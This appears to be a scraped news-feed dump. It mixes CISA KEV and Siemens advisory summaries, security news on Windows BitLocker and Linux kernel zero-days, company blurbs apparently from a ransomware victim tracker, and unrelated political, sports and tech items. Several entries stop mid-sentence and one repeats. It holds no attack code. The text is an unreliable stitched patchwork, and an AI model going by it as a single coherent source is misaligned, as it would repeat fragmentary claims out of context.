Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
Summary: SIMATIC HMI Unified Comfort Panels before V21.0 are affected by a vulnerability that allows an unauthenticated attacker to access the web browser via the help link. This vulnerability allows an attacker to access the web browser through the Control Panel if it is not protected by the corresponding security mechanisms. This opens the possibility for the attacker to find backdoors, which might lead to unwanted misconfigurations. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens SIMATIC are affected: SIMATIC HMI MTP1000 Unified Comfort Panel (6AV2128-3KB06-0AX1) vers:intdot/
Summary: The SIPROTEC 5 devices do not use sufficiently random numbers to generate session identifiers. This could facilitate a brute-force attack against a valid session identifier which could allow an unauthenticated remote attacker to hijack a valid user session. The affected session identifiers are only used in a subset of the endpoints that are provided by the affected products. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet available.

The following versions of Siemens SIPROTEC 5 are affected:
SIPROTEC 5 6MD84 (CP300) vers:intdot/=7.80|=7.80|=7.80|=7.80|=7.80|=7.80 (CVE-2024-54017)
SIPROTEC 5 7SA82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017)
SIPROTEC 5 7SD82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017)
SIPROTEC 5 7SJ81 (CP150) vers:intdot/=7.80 (CVE-2024-54017)
SIPROTEC 5 7SJ82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017)
SIPROTEC 5 7SK82 (CP150) vers:intdot/=7.80|=7.80 (CVE-2024-54017)
SIPROTEC 5 7SL82 (CP150) vers:intdot/=7.80|=7.80|=7.80|=7.80|
Summary: Multiple industrial devices contain a vulnerability that could allow an attacker to cause a denial of service condition. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available.

The following versions of Siemens Industrial Devices are affected:
IE/PB LINK HA (6GK1411-5BB00) vers:all/* (CVE-2025-40833)
IE/PB link PN IO (6GK1411-5AB10) vers:all/* (CVE-2025-40833)
RUGGEDCOM RM1224 LTE(4G) EU (6GK6108-4AM00-2BA2) vers:intdot/
A Nitrogen ransomware attack on Foxconn's North American facilities is one of 600 hits on manufacturers this year, as gangs increasingly target the sector for its low tolerance for downtime.
SpaceX and Blue Origin may yet get a role in low Earth orbit rehearsal, readiness permitting
Former Power Minister Saleh Mamman was convicted last week - but the authorities do not know his whereabouts.
As the US delegation met with their Chinese counterparts in Beijing, some hugely important topics were on the agenda. However, US Secretary of State Marco Rubio also found the time to admire the meeting room’s interior design. Footage of Rubio checking out the ceiling of one of the grand reception rooms in which President Xi Jinping hosted his US counterpart Donald Trump on Thursday went viral online. The candid footage catches Rubio in the East Hall of the Great Hall of the People in Beijing,...
Threat actors have been observed attempting to exploit a recently disclosed security vulnerability in PraisonAI, an open-source multi-agent orchestration framework, within four hours of public disclosure. The vulnerability in question is CVE-2026-44338 (CVSS score: 7.3), a case of missing authentication that exposes sensitive endpoints to anyone, potentially allowing an attacker to invoke the
Tough match ended in victory for Vårgårda against Trollhättan Syr. Alingsås Tidning
In working toward the stable Plasma 6.7 desktop release in mid-June, out today is the first beta of KDE Plasma 6.7...
AI hallucinations are introducing serious security risks into critical infrastructure decision-making by exploiting human trust through highly confident yet incorrect outputs. When an AI model lacks certainty, it doesn’t have a mechanism to recognize that. Instead, it generates the most probable response based on patterns in its training data, even if that response is inaccurate. These outputs
Apple's interest in expanding its Formula 1 streaming deal for Apple TV beyond the United States may have stalled, after Sky Sports signed early renewals to retain the sport's broadcast rights across its largest European markets. Sky and F1 jointly announced on May 6 that Sky will remain F1's exclusive live broadcast partner in the UK and Ireland through the 2034 season, and in Italy through 2032. The five-year extension adds to a UK and Ireland deal that was already running through 2029, so it won't impact any immediate plans Apple may have had, but it certainly pushes those markets further out of reach. Sky's early move secured the rights before they could go to open tender. Sky and F1 did not disclose the value of the deal, but trade publication IBC reported that the UK and Ireland portion is worth around £200 million (around $265–270 million) per season, while other reports put the total figure at around £1 billion (around $1.34 billion). The deal follows recent comments from Apple's senior vice president of services Eddy Cue at the Autosport Business Exchange in Miami. According to a report from MotorBiscuit, Cue said that clinching its F1 streaming rights in the U.S. first was "undoubtedly the best strategy," adding: "I hope we can expand into other markets." Sky may have walled off the British, Irish, and Italian markets for now, but other major European deals remain open – Canal Plus holds French rights only through 2029, for example. Apple's five-year U.S. deal began with the 2026 season, and Apple has already folded its coverage into its wider offerings, with a dedicated F1 section in the Apple TV app, race tracking in Apple Sports, F1 circuit guides in Apple Maps, and playlists in Apple Music. This article, "Apple's F1 Streaming Ambitions Hit Wall as Sky Renews European Rights" first appeared on MacRumors.com.
We have email accounts hosted on a commercial provider's server. Today, we accidentally discovered that some accounts are returning delivery failure notices from gmail.com due to attachment size limits. After logging into the webmail interface, we found a redirect rule named "." (dot) that had been added to these accounts. This rule is designed to forward all incoming emails from the corporate address to a specific Gmail account. None of our users added these rules. If this were happening at the local computer level, it would be one thing, but this is happening directly on the provider's server. Is it possible for such a rule to be created from a mail client (like Outlook or Thunderbird) just by clicking something? The provider insists that this must have been caused by our own actions. submitted by /u/kolo81
Owe Martin Andresen faces charges in both US and Germany connected with money laundering, claims he sent gold bars directly to his doorstep
Founded in 1944 and headquartered in Woonsocket, Rhode Island, Technic Inc. is an international supplier of electroplating chemicals and equipment.
Goldberg Coins & Collectibles Inc. is a family-owned business specializing in numismatic auctions and collectibles, with a legacy dating back to 1930. The company offers expert auction services, personal consultations, and has a strong reputation for achieving record-breaking prices for consignors. Their intended clients include coin collectors and investors looking to sell or acquire high-quality numismatic items. With over 80 years of combined experience, Ira and Larry Goldberg provide a professional and personalized service, ensuring client satisfaction and exceptional results.
The goal of the guidance, which outlines minimum elements, is to help organizations enhance transparency in AI systems and supply chains. The post G7 Countries Release AI SBOM Guidance appeared first on SecurityWeek.
Roe deer on the wrong side of the wildlife fence on the E20. Alingsås Tidning
Last month, Anthropic made a remarkable announcement about its new model, Claude Mythos Preview: it was so good at finding security vulnerabilities in software that the company would not release it to the general public. Instead, it would only be available to a select group of companies to scan and fix their own software. The announcement requires context—but it contained an essential truth. While Anthropic’s model is really good at finding software vulnerabilities, so are other models. The UK’s AI Security Institute found that OpenAI’s GPT-5.5, already generally available, is comparable in capability. The company Aisle ...
Doctors welcome joined-up care plan, but warn patient trust depends on safeguards, access controls, and knowing where Palantir fits in
Xi meeting may force Trump to pivot on chip restrictions and Taiwan.
An anonymous researcher known as Nightmare-Eclipse, who has already leaked several Windows zero-days this year, has disclosed two more: YellowKey and GreenPlasma. The Register reports: Nightmare-Eclipse described YellowKey as "one of the most insane discoveries I ever found." They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine. When it comes to claims like these, we usually exercise some caution, as this bug requires physical access to a Windows PC. However, seeing that BitLocker acts as Windows' last line of defense for stolen devices, bypassing the technology grants thieves the ability to access encrypted files. Rik Ferguson, VP of security intelligence at Forescout, said: "If [the researcher's claim] holds up, a stolen laptop stops being a hardware problem and becomes a breach notification." Despite the physical access requirement, Gavin Knapp, cyber threat intelligence principal lead at Bridewell, told The Register that YellowKey remains "a huge security problem for organizations using BitLocker." Citing information shared in cyber threat intelligence circles, he added that YellowKey can be mitigated by implementing a BitLocker PIN and a BIOS password lock. Nightmare-Eclipse hinted at YellowKey also acting as a backdoor, allegedly injected by Microsoft, although the people we spoke to said this was impossible to verify based on the information available. The researcher also published partial exploit code for GreenPlasma, rather than a fully formed proof of concept exploit (PoC). Ferguson noted attackers need to take the code provided by the researcher and figure out how to weaponize it themselves, which is no small task: in its current state it triggers a UAC consent prompt in default Windows configurations, meaning a silent exploit remains a work in progress. 
Knapp warned that these kinds of privilege escalation flaws are often used by attackers after they gain an initial foothold in a victim's system. "These elevation of privilege vulnerabilities are often weaponized during post-exploitation to enable threat actors to discover and harvest credentials and data, before moving laterally to other systems, prior to end goals such as data theft and/or ransomware deployment," he said. "Currently, there is no known mitigation for GreenPlasma. It will be important to patch when Microsoft addresses the issue." The other zero-days leaked include RedSun, a Windows Defender privilege escalation flaw; UnDefend, a Windows Defender denial-of-service bug; and BlueHammer, a separate Microsoft vulnerability tracked as CVE-2026-32201 that was patched in April. According to The Register, RedSun and UnDefend remained unfixed at the time of publication, and proof-of-concept code for the flaws was reportedly picked up quickly and abused in real-world attacks. Read more of this story at Slashdot.
Drones bound for Russia crashed down in Latvia last week, prompting a political fallout.
The company’s latest quarterly advisory describes high and medium-severity issues in BIG-IP, BIG-IQ, and NGINX. The post F5 Patches Over 50 Vulnerabilities appeared first on SecurityWeek.
Sent out on Wednesday was the latest AMDGPU/AMDKFD driver pull request of new feature code ready for DRM-Next as the staging area ahead of the upcoming Linux 7.2 kernel. This doesn't yet land the HDMI 2.1 enablement work that's finally been taking place but it is preparing for that with the FRL register headers now in place as part of this merge...
Introduced to the Linux kernel last year was Control-flow Enforcement Technology "CET" virtualization for modern AMD and Intel CPUs. This complements CET that has existed in Linux for quite some time but it's new now to the KVM virtualization world, but some yet to be diagnosed problems are causing some hosts to hang when making use of this virtualization security feature...
Dell confirmed that its SupportAssist software is causing blue-screen crashes on some Windows systems following a wave of user reports about random reboots affecting Dell devices since Friday. [...]
Fresh kernel flaw comes with public exploit code and continues ugly run of highly reliable privilege escalation bugs tied to memory and page-cache handling
The United States’ first firing of its Philippines-based Typhon missile launcher last week marked the “worst provocation” in years in the South China Sea and Beijing should ramp up air defence and stealth strike drones in response, according to Chinese military observers. Beijing has opposed the Typhon deployment since the Lockheed Martin system arrived at its Luzon base in the Philippines two years ago, claiming it has destabilised regional security. The ground-based vertical launch system can...
Book tip • A deeply unsettling story of human short-sightedness. Alingsås Tidning
The first exploitation attempts were observed less than four hours after the authentication bypass was publicly disclosed. The post Hackers Targeted PraisonAI Vulnerability Hours After Disclosure appeared first on SecurityWeek.
When Presidents Trump and Xi met, the Taiwan question was absolutely decisive, according to China. The US, on the other hand, does not even mention Taiwan in its account shortly after the meeting. Now the stability of yet another strait important to world trade may be under threat.
Pay up, or we'll pay someone to pay you a visit. Cybercrime gangs are increasingly turning to real-world threats - and even hiring local muscle to deliver the message. Read more in my article on the Hot for Security blog.
An anonymous cybersecurity researcher who disclosed three Microsoft Defender vulnerabilities has returned with two more zero-days involving a BitLocker bypass and a privilege escalation impacting Windows Collaborative Translation Framework (CTFMON). The security defects have been codenamed YellowKey and GreenPlasma, respectively, by the researcher, who goes by the online aliases Chaotic Eclipse
**Website**: baytech.dk **Revenue**: $5 Million Baytech A/S is a Danish industrial engineering company that provides crane systems, material handling equipment, and logistics solutions for industria
AI already listening in to call handlers in real time, conducting live database searches
Xi Jinping and Donald Trump struck an optimistic tone at the start of their two-day presidential summit in Beijing, even as the Chinese leader highlighted risks surrounding Taiwan. Pre-summit trade talks “produced generally balanced and positive outcomes”, Xi told the US president at the Great Hall of the People in Beijing on Thursday, according to Xinhua. “This is good news for the people of the two countries and the world.” Trump repeatedly called Xi a “great leader” in opening comments at the...
A stray Falcon 9 rocket part is on course to slam into the moon in August. The expected impact poses no immediate danger, experts say, but warn that it highlights a critical lack of rules for managing debris as lunar activity by the US, China and private companies ramps up. Measuring 13.8 metres (45 feet) long and 3.7 metres wide, the SpaceX Falcon 9 rocket’s upper stage has been drifting through Earth-moon space since it launched a US commercial lander and a Japanese lander in January last...
Latvia's Prime Minister Evika Silina is resigning from her post after the opposition threatened to table a motion of no confidence.
The alleged main administrator of Dream Market Incognito Market, one of the largest dark web marketplaces before its shutdown, has been indicted in the United States on money laundering charges. [...]
So, since the beginning of 2026, the company has been laying people off. More than 40 people have already left, and they are still continuing. From what I’ve heard, I think they are planning to let me go as well. I think it’s because there are only me and my manager left in IT, and maybe they feel that two people are too many for the number of employees who will remain. From what I heard, they asked my manager, “If he leaves, will productivity drop?” and he said no. Lately, he has also been asking me a lot of technical questions, almost like he’s trying to learn everything he will need. Even though he is technically the IT manager, most of the time he is not around, and I’m the one who actually works with the users. Honestly, technically speaking, he’s not that good. Him saying that “productivity will not drop” really made me angry at him, and now I don’t even want to teach him anything anymore. Any advice, guys? submitted by /u/Vegetable-Clock-4488
Sandstorms, lightning strikes and heavy downpours are causing chaos and devastation in northern India. Nearly 100 people are reported to have died.
CAD: Cost Anomaly Detection or Create Astounding Debt?
Goldberg Coins & Collectibles Inc. is a family-owned business specializing in numismatic auctions and collectibles, with a legacy dating back to 1930. The company offers expert auction services, personal consultations, and has a strong reputation for achieving record-breaking prices for consignors. Their intended clients include coin collectors and investors looking to sell or acquire high-quality numismatic items. With over 80 years of combined experience, Ira and Larry Goldberg provide a professional and personalized service, ensuring client satisfaction and exceptional results.
Article URL: https://github.com/oven-sh/bun/pull/30412 Comments URL: https://news.ycombinator.com/item?id=48132488 Points: 634 # Comments: 697
US President Donald Trump’s second son Eric, who oversees the family business empire, met the top Chinese leader as he accompanied his father on a state visit to Beijing. Eric and his wife Lara posed for photos with Chinese President Xi Jinping before they attended a state banquet on Thursday evening. The younger Trump and the Chinese leader were also seen chatting during a visit to the Temple of Heaven in the afternoon. The executive vice-president of his father’s businesses, Eric oversees...
ORF was not involved in cutting out protest chants against Israel during Eurovision in clips that were uploaded to YouTube, the Austrian broadcaster writes to SVT. "We show exactly what is going on in the arena," says head of events Oliver Lingens.
The original researcher claimed that TPM+PIN works. I tend to agree, however the issue is not the same as with TPM-only BitLocker bypass. There are two scenarios we could consider - theft and unauthorized access by the user themselves. A TPM-only BitLocker-encrypted PC is vulnerable to thieves being able to read all data with the currently published exploit. It is already bad, but adding a PIN is a sufficient protection against such scenarios. However, this vulnerability backdoor opens unrestricted, unauthorized access to the file system for the users themselves. At this point consider that all regular users can read and write to any file, if they want. Files like SAM, the registry, anything that is on the file system (like the passwords for the BIOS you store in C:\IT only readable by SYSTEM and TrustedInstaller). TPM+PIN does not protect against this as the users do know the PIN. ༼ つ ◕_◕ ༽つ SUMMON THE PATCH, MICROSOFT ༼ つ ◕_◕ ༽つ submitted by /u/m1m1n0
Linux distros are rolling out patches for a new high-severity kernel privilege escalation vulnerability (known as Fragnasia and tracked as CVE-2026-46300) that allows attackers to run malicious code as root. [...]
Details have emerged about a new variant of the recent Dirty Frag Linux local privilege escalation (LPE) vulnerability that allows local attackers to gain root access, making it the third such bug to be identified in the kernel within a span of two weeks. Codenamed Fragnesia, the security vulnerability is tracked as CVE-2026-46300 (CVSS score: 7.8) and is rooted in the Linux kernel's XFRM
Human IT managers thought they were being nice to the boss, but were assisting a threat actor
A trio of preprint papers suggests the universe may not be perfectly uniform on the largest scales, finding tentative 2-to-4-sigma deviations from a core assumption of standard cosmology known as FLRW geometry. Live Science reports: The work combines observations of distant exploding stars and large-scale galaxy surveys to probe whether the universe truly follows a nearly 100-year-old mathematical framework known as Friedmann-Lemaitre-Robertson-Walker (FLRW) cosmology. The analyses revealed mild-but-intriguing deviations from the predictions of the standard model. "We saw a surprising violation of an FLRW curvature consistency test, hinting at new physics beyond the standard model," study co-author Asta Heinesen, a physicist at the Niels Bohr Institute in Copenhagen and Queen Mary University in London, told Live Science via email, referring to the assumption that the space's curvature is the same everywhere. "This could potentially be due to various effects, but more research is needed to address the cause of the FLRW violation that we see empirically." [...] The analyses revealed small but potentially important departures from the predictions of standard FLRW cosmology. Depending on the dataset and analysis method, the discrepancy reached a statistical significance of about 2 to 4 sigma. In physics, sigma measures how likely a result is to arise purely by chance; a 5-sigma result is typically required before scientists claim a discovery, so the new findings remain tentative. Still, the results suggest that something unexpected may be affecting the geometry or expansion of the universe. "The main finding is that you can directly measure Dyer-Roeder and backreaction effects from available cosmological data, and clearly distinguish these effects from other alterations of the standard cosmological model, such as evolving dark energy and modified gravity theories," Heinesen said.
"This was previously not possible in such a direct way, and this is what I think is the breakthrough in our work." "If these indicated deviations from an FLRW geometry are real, it would signify that most of the cosmological solutions considered for solving the cosmological tensions -- evolving or interacting dark energy, new types of matter or energy, modified gravity and related ideas within the FLRW framework -- are ruled out," the researchers wrote. The next step will involve applying the new theoretical framework to larger and more precise datasets. "It is to apply our theoretical results to data to test the standard model and to produce constraints on the Dyer-Roeder and backreaction effects," Heinesen said. Read more of this story at Slashdot.
UK researchers find LLMs are learning to finish jobs faster and improving all the time
Besides serving as a place where Microsoft Outlook places suspected spam, the Outlook Junk folder has one additional function that can be quite helpful when it comes to identifying malicious messages. Any e-mail placed in this folder is stripped of all formatting, and destinations of all links included in the message become visible to the user, as you can see in the following images which show the same e-mail when it is placed in the inbox, and when it is placed in the Junk folder.
It was a roughly two-hour meeting in Beijing for Presidents Xi and Trump. On the agenda were Taiwan, trade and other points of conflict in relations between the US and China. "The handling of Taiwan could put the whole relationship in serious danger," said President Xi.
"The conversation is sort of happening in Silicon Valley around one thing, and a totally different conversation is happening among consumers," Campbell Brown said at StrictlyVC.
Cybersecurity researchers have disclosed multiple security vulnerabilities impacting NGINX Plus and NGINX Open, including a critical flaw that remained undetected for 18 years. The vulnerability, discovered by depthfirst, is a heap buffer overflow issue impacting ngx_http_rewrite_module (CVE-2026-42945, CVSS v4 score: 9.2) that could allow an attacker to achieve remote code execution or cause a
The US-China summit is “extremely important” to arrest the downward spiral of relations between the two countries, according to Li Cheng, a leading Chinese academic. But a summit would not be enough to change the overall structure of ties, which had been fraught for years, Li said on Thursday as US President Donald Trump began the first full day of his state visit to Beijing – the first by an American leader since 2017. The two presidents began the day with two hours of talks at the Great Hall...
So yellowkey was released yesterday on GitHub and not gonna lie, this thing scares me. A full encryption bypass method that basically makes BitLocker obsolete. My question is: are there any ways of mitigating this without spending too much? submitted by /u/DaveTheAllrighty
Rebel fighters and Rwandan troops are accused of committing atrocities after capturing the DR Congo city of Uvira in December.
Chinese web giant says accelerator shortage is over as local hardware arrives in volume
Watch the documentary about Jamila and Amina Ouahid. They want to make their mark in TV and film in Sweden, but face a reality in which deaf people are rarely seen in front of the camera.
Amazon Web Services (AWS) is reshaping its underlying network infrastructure, a move that could redefine how enterprises approach cloud technology, costs and operational efficiency. As enterprises consider next-generation workloads, from generative AI to globally distributed applications, AWS's end-to-end custom network stack provides a new starting point for cloud economics, flexibility and security. Let's take a closer look at what AWS has announced, why it matters, and how smart enterprise technologists should plan to navigate the landscape of opportunities.
Let's start with AWS's new networking philosophy, which focuses on making network connectivity almost invisible to both users and administrators. For AWS, the network must be as reliable as flipping a light switch: it simply works, and nobody notices it unless it breaks. To achieve this lofty goal, AWS has over the past decade moved away from traditional, proprietary network hardware and built a unified, custom stack that spans everything from silicon to software.
At the core of this innovation is the decision to use a single application-specific integrated circuit (ASIC) for switching, the silicon brain at the center of every network switch, across its aggregation, core and edge networks. Instead of the old industry practice of mixing and matching hardware from different vendors (each with its own firmware, bugs and scaling challenges), AWS has network engineering and operations teams that focus on a single, consistent foundation. This not only simplifies procurement and troubleshooting but also enables scalable, repeatable deployments that outpace conventional enterprise or cloud architectures.
All of these switches run Net OS, a Linux-based operating system that AWS has developed to optimize security, automation and rapid patching. If a fault occurs, AWS can fix it everywhere, immediately; there is no need to wait for vendor patches and no risk that yesterday's firmware problem escalates into tomorrow's outage.
The numbers are staggering. The current AWS switch handles 51.2 terabits per second (Tbps) across 64 ports, each running at 800 Gbps. But the pace of innovation is accelerating: AWS's next-generation switch, coming soon, will reach 102.4 Tbps, with ports running at 1.6 Tbps. In total, AWS's network consists of roughly 2 million devices, 50 to 60 million optical links and more than 20 million kilometers of fiber, enough to circle the moon 25 times.
Enterprise complexity is exploding
Why should enterprises care about this? Networking remains a hidden driver of cloud costs, reliability and flexibility. The more complex your application portfolio becomes, from AI-driven clusters to globally distributed databases, the more you pay for bandwidth, latency, downtime and administrative overhead. AWS's custom stack means that the network's reliability, speed and security are built into the infrastructure. When AWS upgrades its hardware and software, enterprises get access to those improvements immediately.
One highlight is the introduction of hollow-core fiber. By replacing traditional fiber with glass tubes surrounded by air (or vacuum), AWS reduces network latency by 30 percent, making data center regions larger, more flexible and better equipped to meet low-latency demands, at a premium price for workloads where latency is the difference between profit and loss.
AWS's high-precision networking is another groundbreaking innovation for workloads such as distributed databases and financial trading platforms. By synchronizing clocks with microsecond accuracy, AWS enables globally consistent transactions, opening up new application architectures for enterprises that were previously forced to pay high prices for specialized hardware and software.
Even more important is the "invisible" network strategy. Because AWS owns both the hardware and the software, it can quickly resolve bugs, fix vulnerabilities and optimize performance. For enterprise workloads, this reduces risk, shortens maintenance windows and speeds the adoption of new technologies such as generative AI. The new Ultra Cluster network topology also reduces the number of switches between servers, lowers latency and supports giant clusters, which is crucial for enterprises betting big on AI training and inference.
Achieve cost savings and avoid pitfalls
Enterprises planning to adopt AWS's latest network platform should start preparing now, even if adoption is several months away. First, conduct a thorough analysis of current and future network needs. If your workloads are becoming increasingly distributed, real-time or bandwidth-intensive (think AI, Internet of Things, database sharding or financial trading), you are probably an excellent candidate to benefit. Map your existing architectures against high-performance, low-latency network regions within AWS and evaluate whether your cloud-native or hybrid workloads can take advantage of these innovations without major changes to code or data architecture.
Second, rethink your operating model. Because AWS manages so much of the network stack, IT teams must shift focus from deep infrastructure management to strategic workload placement, cost optimization and performance tuning. What was once a highly specialized skill, fine-tuning vendor-specific hardware and software, is giving way to a model driven by visibility, automation and integration across AWS services. Enterprises should invest in training and tools that enable their teams to respond quickly to network upgrades, new feature launches and changes in data locality, so that they remain agile and competitive.
Finally, evaluate partnerships, security and compliance models. AWS's custom stack offers improved patching and rapid response to vulnerabilities, but enterprises must ensure that their own security controls and audit trails are up to the task. This includes reviewing incident response plans, compliance certifications and monitoring capabilities, especially as the network backbone becomes "invisible" and less directly controlled.
Where does AWS's platform fit?
AWS's innovations are ideal for enterprises with high-performance, distributed workloads, for enterprises scaling out in ways that strain legacy architectures, or for those that want to minimize downtime and operational friction. If speed, reliability and extremely low latency are key competitive advantages, AWS's custom stack will almost certainly be a fit.
But not every enterprise or workload needs the very latest. Enterprises with stable, low-volume workloads, little geographic spread or limited dependence on real-time data may find the high prices for the latest network infrastructure unnecessary. For some, multicloud or hybrid deployments retain strategic value for reasons of flexibility or compliance; for these organizations, careful architecture is required to avoid lock-in and to ensure that workloads can span multiple providers or on-premises environments.
Ultimately, AWS's new network platform is not just about speed or capacity. It signals a shift toward operational agility, security and cost optimization for enterprises willing to adapt, and a warning to those that fall behind. The days of wrestling with a patchwork of hardware vendors and waiting for network upgrades are coming to an end. To take advantage of AWS's network revolution, enterprises must evolve their strategies today by aligning technology, people and processes to gain a competitive edge tomorrow.
After three weeks of testimony, the Musk v. Altman trial is nearing its end. OpenAI has rested its case, closing arguments are set for Thursday, and jury deliberations are expected to begin afterward. An anonymous reader quotes a report from Business Insider: Joshua Achiam, OpenAI's chief futurist, was probably the most memorable witness of the day. He told jurors about a companywide meeting where Musk answered questions about his planned departure from OpenAI in 2018. Musk told the crowd of 50 or 60 people that he was leaving OpenAI to start his own competing AI. He said he wanted to "build it very fast, because he was very worried that someone else, if they got it, would do the wrong thing with it," Achiam said. Achiam said he challenged Musk on the safety of this approach, which he called "unsafe and reckless." "How did Musk respond," OpenAI's lawyer Randall Jackson asked. "Defensively," Achiam said. "We had a pretty tense exchange, and he snapped and called me a jackass." In an effort to prove Achiam's story, OpenAI's lawyers brought a trophy to court that the futurist said he received after his heated exchange with Musk. On the witness stand, Achiam described the trophy as "a small golden jackass, inscribed with: 'never stop being a jackass for safety.'" He said his then-colleagues, Dario Amodei and David Luan, gave it to him as a thank-you for standing up to the Tesla CEO. Lead OpenAI attorney William Savitt told reporters after the day's session that Wednesday had been the first time he'd touched the statue. The futurist had to do without the visual aid, however. Judge Yvonne Gonzalez Rogers did not accept the trophy as evidence, so it did not appear before the jury. Musk and Altman have presented dueling experts on a question at the core of the trial -- was the nonprofit that runs OpenAI hurt or helped by its $13 billion partnership with Microsoft?
Musk's expert testified last week that the partnership was indeed hurt, supporting the Tesla CEO's contention that in partnering with Microsoft, OpenAI betrayed the company's nonprofit origins and mission. But on Thursday, OpenAI's expert, John Coates, used Musk's expert's own pie chart and testimony against him. The partnership has "generated value for the nonprofit that I believe he himself accepted was in the $200 billion range in his own testimony," Coates said, referencing Musk expert Daniel Schizer. "If that's not faring well, I don't know what faring well is." In a scored point for Musk, the jury learned Thursday that Microsoft's own CTO once raised concerns about how OpenAI's early nonprofit donors, including LinkedIn cofounder Reid Hoffman, would react to a partnership. "I wonder if the big OpenAI donors are aware of these plans," Chief Technology Officer Kevin Scott said in a 2018 email he was asked to read aloud to jurors. In it, Scott said he doubted donors would appreciate OpenAI using their seed money to "go build a for-profit thing." Scott was being questioned by an OpenAI lawyer, who may have wanted jurors to quickly hear Scott's explanation: that he only had a "vague awareness" of what was happening at OpenAI at the time. Scott also told the jury he wasn't thinking about Musk when he made the remark. "Primarily, I was thinking about Reid Hoffman. He was the OpenAI donor I knew," Scott said, adding, "I wasn't thinking about anyone besides him."
Recap: Sam Altman Testifies That Elon Musk Wanted Control of OpenAI (Day Ten); Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine); Sam Altman Had a Bad Day In Court (Day Eight); Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven); Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six); OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five); Musk Concludes Testimony At OpenAI Trial (Day Four); Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three); Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two); Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One). Read more of this story at Slashdot.
Li Hongzhi, an award-winning former head of GenAI at Microsoft Asia, has joined Tongji University, one of China’s leading universities. Li started his first job at technology giant Microsoft immediately after obtaining his PhD from Columbia University. For more than 10 years, he worked at Microsoft Research – the company’s subsidiary responsible for basic and applied research in computer science, software engineering and hardware design. Li was the head of Microsoft AI Asia’s GenAI Group before...
Chinese President Xi Jinping held closed-door talks with his American counterpart Donald Trump following an elaborate welcome ceremony at the Great Hall of the People in Beijing. Here are some highlights from Thursday. Defining Ties Xi and Trump agreed to build a “constructive, strategically stable relationship”, a new term to define the framework of ties between the two countries. The new strategic position should be led by cooperation and “measured competition with healthy stability”, Xi...
Article URL: https://www.anthropic.com/news/claude-for-small-business Comments URL: https://news.ycombinator.com/item?id=48130950 Points: 520 # Comments: 458
Today, we welcome the 44th government onboarded to Have I Been Pwned’s free gov service: The Bahamas. The National Computer Incident Response Team of The Bahamas, CIRT-BS, now has access to monitor government domains against the data in HIBP. As the national CIRT, CIRT-BS is responsible for coordinating
The opposition pulls ahead in SVT/Verian's May poll. The Tidö parties lose 1.5 percentage points and the red-green parties record a lead of 10.7 percent. The gap between the blocs is the largest since August 2023.
Reducing memory requirements to control costs in a new wave of kit
In Ludvika and Fagersta, the municipalities face a fateful deal. They are being offered the chance to buy state-owned Vattenfall's shares in the energy company VB Energi for 1.4 billion. If they decline, critical infrastructure risks ending up in the hands of foreign buyers. "This opportunity will not come again," says Åsa-Märta Sjöström (S), municipal commissioner in Fagersta.
Seven of a total of 18 political independents in Östergötland are former Social Democrats, a review by SVT Nyheter Öst shows. "It is always a failure when a political representative chooses to leave the party but keeps their posts," says Ellen Aguirre.
This week, two people have filmed wolves in Kalmar County. At the start of the week a wolf was seen in Bergkvara in Torsås Municipality, and on Wednesday a wolf turned up in Gamleby in Västervik Municipality. "It is not possible that it is the same individual," says Fredrik Ustrup at the County Administrative Board.
Hannes Lindgren has posted an appeal on social media seeking a companion and company for his many days at Liseberg this summer. Interest has been considerably greater than he expected. "Now it's around 40, something like that," he says.
Even before US President Donald Trump touched down in Beijing on Wednesday, the first act of the China-US summit was playing out in the skies above the Chinese capital. Hundreds of professional photographers and residents lined up across various points near Beijing Capital International Airport to capture one of the most recognisable symbols of the American presidency – Air Force One. Within minutes of its appearance, Chinese social media was flooded with videos and photos of the aircraft’s...
Article URL: https://github.com/DrCatHicks/learning-opportunities Comments URL: https://news.ycombinator.com/item?id=48130679 Points: 232 # Comments: 46
Intimate care for the elderly sparked heated debate in the municipal council Alingsås Tidning
Article URL: https://www.tomshardware.com/tech-industry/cyber-security/microsoft-bitlocker-protected-drives-can-now-be-opened-with-just-some-files-on-a-usb-stick-yellowkey-zero-day-exploit-demonstrates-an-apparent-backdoor Comments URL: https://news.ycombinator.com/item?id=48130519 Points: 251 # Comments: 139
China's Xi Jinping has received Donald Trump of the US in Beijing. It is the first time in nearly a decade that the two presidents have met in China. "We should be partners and not rivals," Xi says at the welcome.
Draw between Gerdsken and Skepplanda after a see-saw match Alingsås Tidning
Article URL: https://blogs.cisco.com/news/our-path-forward Comments URL: https://news.ycombinator.com/item?id=48130123 Points: 270 # Comments: 305
US President Donald Trump is meeting Chinese President Xi Jinping for a much-anticipated summit that could shape the next stage of rivalry between the world’s two superpowers. It is the first visit to...
Vårgårda turned a half-time deficit into victory Alingsås Tidning
Chinese universities have significantly overtaken their American rivals in research output at one of the world’s leading artificial intelligence (AI) conferences, according to an analysis of more than 5,000 accepted papers that went viral on social media. Among the top 50 institutions contributing to the International Conference on Learning Representations (ICLR), held in Rio de Janeiro last month, mainland China accounted for about 44 per cent of the total, with Tsinghua University, Shanghai...
